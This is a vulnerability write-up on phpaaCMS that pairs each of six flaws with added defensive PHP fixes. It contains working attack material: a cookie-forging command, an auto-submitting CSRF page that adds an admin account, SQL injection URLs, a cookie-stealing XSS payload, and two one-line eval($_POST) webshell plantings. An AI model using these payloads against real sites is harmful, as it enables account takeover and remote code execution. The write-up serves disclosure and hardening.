Author: Brother Fei
1. Cookie spoofing
Cause:
The admin backend treats any non-empty userid cookie as a logged-in user; the check is only that the cookie exists:
    if (!isset($_COOKIE['userid']) || empty($_COOKIE['userid'])) {
        // userid cookie is not set or is empty
        setcookie('lastURL', get_url());   // remember the last visited address
        header("Location: login.php");     // redirect to the login page
    }
Test:
In the browser, run javascript:alert(document.cookie="userid=1") to set the cookie yourself.
The backend then treats you as logged in and you can enter it directly.
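The following is an added example (not phpaaCMS code) showing the defensive fix for this section: the login state is kept in a server-side session that the browser cannot forge, instead of in a client-controlled cookie. The table and column names (phpaadb_users, password_hash) and the use of password_hash()-style hashes are assumptions for the example.

```php
<?php
// Added example, not phpaaCMS code: replace the cookie-only check with a
// server-side session. The client can set document.cookie freely, so a
// cookie value such as userid=1 must never be taken as proof of login.
session_start();

// The vulnerable pattern from the writeup: any non-empty cookie passes.
function is_logged_in_cookie_only(array $cookie): bool
{
    return isset($cookie['userid']) && !empty($cookie['userid']);
}

// Hardened: the login handler stores userid in $_SESSION only after the
// password is verified. The value lives on the server and is keyed by a
// random session id, so there is nothing for the client to tamper with.
// Assumed schema: phpaadb_users(userid, username, password_hash).
function login(string $username, string $password, PDO $db): bool
{
    $stmt = $db->prepare('SELECT userid, password_hash FROM phpaadb_users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);               // defeats session fixation
    $_SESSION['userid'] = (int) $row['userid'];
    return true;
}

// Every admin page calls this before doing anything else.
function require_login(): void
{
    if (empty($_SESSION['userid'])) {
        setcookie('lastURL', $_SERVER['REQUEST_URI'] ?? '/',
                  ['httponly' => true, 'samesite' => 'Lax']);
        header('Location: login.php');
        exit;                                  // header() alone does not stop the script
    }
}
```

Note the exit after header(): without it the rest of the admin page still executes and renders for an unauthenticated request, even though the browser is told to redirect.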
2. CSRF
Cause:
The front-end message board accepts HTML, and the admin "add user" action does not verify where the submitted request comes from.
Fix: add a token (or verification code) to the admin form and check the Referer header to block CSRF.
Test
Capture the request sent when an administrator is added, then build an HTML page on a remote server that replays it.
Post a message to the board containing <a href="remote HTML">Add an administrator to test</a>.
When the administrator clicks the link, the form is submitted and a new administrator is added.
CSRF Exp
    <html>
    <head><title>Exp phpaaCMS CSRF by Brother Fei</title></head>
    <body onload="javascript:document.form.submit()">
    <form action="http://www.bkjia.com/cms/phpaaCMS/admin/user.action.php" method="post" name="form">
    <input type="hidden" name="act" value="add">
    <input type="hidden" name="username" value="feihacker">
    <input type="hidden" name="password" value="xxxx">
    <input type="hidden" name="password2" value="xxxx">
    <input type="hidden" name="userid" value="0">
    </form>
    </body>
    </html>
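As an added example (not phpaaCMS code), here is the fix the section proposes: a per-session synchronizer token on the admin form, checked in admin/user.action.php before act=add is handled, with an Origin/Referer check as a second layer. The field name csrf_token and the helper names are assumptions.

```php
<?php
// Added example, not phpaaCMS code: CSRF protection for the admin
// "add user" action. The forged page above can post the form fields, but
// it cannot read the token stored in the victim's session.
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Emitted inside the admin form in admin/user.add.php (assumed location).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(array $post): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals compares in constant time and returns false on length mismatch
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Second layer: reject cross-site posts by Origin (or Referer) header.
// Fail closed when neither is present; same-site form posts always carry one.
function same_origin(array $server, string $host): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($origin === '') {
        return false;
    }
    return strcasecmp((string) parse_url($origin, PHP_URL_HOST), $host) === 0;
}

// In admin/user.action.php, before the add action runs:
if (($_POST['act'] ?? '') === 'add') {
    if (!csrf_check($_POST) || !same_origin($_SERVER, $_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        exit('CSRF check failed');
    }
    // ... only now create the user
}
```

The token check is the primary defence; the header check alone is weaker because some proxies strip Referer, which is why it is used only to reject, never to accept, a request.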
3. Injection
Cause:
Parameters are not filtered before being concatenated directly into SQL statements.
Vulnerable pages:
    admin/page.add.php
    admin/message.action.php
    admin/article.add.php
    search.php
    $userid = trim($_GET['userid']) ? trim($_GET['userid']) : 0;   // only whitespace is trimmed
    find("select * from phpaadb_users where userid=" . $userid);
The three admin pages above are all caused by this lax filtering of userid.
Test:
http://www.bkjia.com/phpaaCMS/admin/friendlink.add.php?act=edit&id=1%20and%201=2%20union%20select%28%,3,user%,5,6
http://www.bkjia.com/phpaaCMS/admin/user.add.php?act=edit&userid=31 union select 1,user(),3
http://www.bkjia.com/phpaaCMS/admin/article.add.php?act=add&cid=1&id=32%27
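The following added example (not phpaaCMS code) puts the vulnerable lookup next to its fix. The original pattern only trims whitespace, so a value like "31 union select 1,user(),3" reaches the query intact; the hardened version validates the id as an integer and binds it as a parameter. Function names and the use of PDO are assumptions.

```php
<?php
// Added example, not phpaaCMS code: the lookup behind admin/user.add.php,
// first as the writeup shows it, then with type validation and binding.

// Vulnerable: trim() strips spaces only, and the value is concatenated into
// the SQL text, so a crafted userid changes the query structure.
function build_query_vulnerable(string $userid_raw): string
{
    $userid = trim($userid_raw) ? trim($userid_raw) : 0;
    return "select * from phpaadb_users where userid=" . $userid;
}

// Hardened lookup.
function find_user(PDO $db, $userid_raw): ?array
{
    // 1. Type enforcement: a user id is a positive integer and nothing else.
    $userid = filter_var($userid_raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($userid === false) {
        return null;
    }
    // 2. Parameter binding: the value travels separately from the SQL text,
    //    so it can only ever be compared, never parsed as SQL.
    $stmt = $db->prepare('SELECT * FROM phpaadb_users WHERE userid = :id');
    $stmt->bindValue(':id', $userid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The same treatment for the other parameters named in the test URLs
// (id, cid, userid): anything that is not an integer becomes null and the
// page refuses to build a query from it.
function validate_ids(array $get): array
{
    $ids = [];
    foreach (['id', 'cid', 'userid'] as $name) {
        $v = filter_var($get[$name] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
        $ids[$name] = ($v === false) ? null : $v;
    }
    return $ids;
}
```

For search.php, where the keyword is a free string rather than an integer, the same binding rule applies: pass the keyword as a bound parameter (wrapping it in % wildcards in PHP, not in the SQL string) rather than concatenating it.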
4. XSS
Cause:
HTML tags entered in the search field are not filtered or encoded before being reflected into the page.
Vulnerable page: search.php
Test
http://www.bkjia.com/phpaacms/search.php?keywords="><ScRiPt>alert(document.cookie);</ScRiPt>
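As an added example (not phpaaCMS code), this is how search.php can reflect the keyword safely: encode at output time for the HTML context it lands in, and send a Content-Security-Policy so that an injected inline script would not run even if an encoding step were missed. The helper name e() and the page layout are assumptions.

```php
<?php
// Added example, not phpaaCMS code: output encoding for the reflected
// search keyword, plus a CSP as defence in depth.

// Encode for an HTML body or attribute context. ENT_QUOTES also encodes
// the single quote, so the result is safe inside single-quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The keyword is reflected twice: inside an attribute and in the body.
// Both go through e(), so the closing quote and the <script> tag in the
// test payload are emitted as entities and rendered as literal text.
function render_search(string $keywords): string
{
    return '<input type="text" name="keywords" value="' . e($keywords) . '">'
         . '<p>Results for: ' . e($keywords) . '</p>';
}

// Defence in depth: without 'unsafe-inline', the browser refuses to execute
// an inline <script> block even if some other template forgets to encode.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('X-Content-Type-Options: nosniff');

echo render_search((string) ($_GET['keywords'] ?? ''));
```

Encoding belongs at the output step, not on input: the same keyword may later be placed in a SQL parameter, a JSON response or a URL, and each of those contexts needs its own encoding.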
5. Writing a one-line webshell through the backend data restore function
Cause:
The restore function executes whatever SQL statements the administrator supplies, so custom SQL can be run during recovery.
Test:
Put the following in the SQL script:
    select * from hacker union select '1' from mysql.user into outfile 'd:\www\hack.php'
When the restore runs, the file is written to the web root, so a webshell can be planted.
6. Writing a one-line webshell into the configuration file
Cause:
The site configuration values are written verbatim into the website.inc.php file.
Test
A regular PHP webshell cannot be written directly, so I constructed the following PHP variant:
    /")?><?php @eval($_POST[hack] //
It closes the surrounding quote and PHP tag correctly. When saving the site configuration, put this variant in the administrator's email address field.
Yes
Fixed: changed
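The following added example (not phpaaCMS code) shows how a generated config file such as website.inc.php can be written so that no submitted value can end the string literal or the PHP block: each value is validated first, then emitted with var_export, which escapes quotes and backslashes. The settings names and the file layout are assumptions.

```php
<?php
// Added example, not phpaaCMS code: safe generation of a PHP config file
// from administrator-supplied settings.

// Validate before anything is written. An email field can only hold an
// email address, so the payload from the writeup is rejected outright.
function validate_settings(array $in): array
{
    $email = filter_var($in['admin_email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        throw new InvalidArgumentException('admin_email is not a valid address');
    }
    return [
        'site_name'   => (string) ($in['site_name'] ?? ''),
        'admin_email' => $email,
    ];
}

// Emit the file with var_export. Each string becomes a single-quoted PHP
// literal with \' and \\ escaped, so a closing quote, a close tag or an
// open tag inside a value stays inside the string when the file is included.
function write_config(string $path, array $settings): void
{
    $php = "<?php\n// generated by the admin panel, do not edit by hand\nreturn "
         . var_export($settings, true) . ";\n";
    // Write to a temp file and rename so a half-written config is never loaded.
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, $php, LOCK_EX) === false || !rename($tmp, $path)) {
        throw new RuntimeException("cannot write $path");
    }
}

// Usage: $config = require 'website.inc.php'; gives back the array.
write_config(__DIR__ . '/website.inc.php', validate_settings($_POST));
```

A stronger design avoids the problem entirely by storing settings in a non-executable format (JSON or the database) rather than in a PHP file, so that even a missed escaping step cannot turn configuration data into code.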